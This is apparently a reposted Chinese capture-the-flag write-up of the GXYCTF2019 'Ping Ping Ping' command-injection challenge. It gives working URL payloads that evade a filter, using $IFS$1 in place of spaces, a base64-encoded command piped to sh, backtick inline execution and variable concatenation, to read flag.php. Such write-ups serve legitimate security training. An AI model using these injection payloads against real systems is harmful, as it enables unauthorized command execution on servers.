首页 > 其他 > 详细

[GXYCTF2019]Ping Ping Ping wp

时间:2020-08-22 08:13:47      阅读:147      评论:0      收藏:0      [点我收藏+]

根据题目考虑是命令注入方面,

打开网页,使用?ip=127.0.0.1;ls查询存在文件

技术分享图片

 

 后尝试使用?ip=127.0.01;cat flag.php打开flag.php无果

尝试打开index.php寻找打开flag.php方法

?ip=127.0.01;cat index.php

技术分享图片

 

 考虑应该是空格被禁用了,使用其他方式代替空格

1.< <> 无果

2.${IFS}$出现

技术分享图片

 

 应该是{}被禁用

后使用$IFS$1成功

技术分享图片

 

 技术分享图片

 

 禁用条件一目了然

后使用?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

可得flag

技术分享图片

 

 法二,使用?ip=127.0.0.1;cat$IFS$1`ls`可得flag

原理方法名叫内联执行

将反引号内命令的输出作为输入执行

技术分享图片

 

 

也可使用拼接方法

?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

[GXYCTF2019]Ping Ping Ping wp

原文:https://www.cnblogs.com/ly2333/p/13543932.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!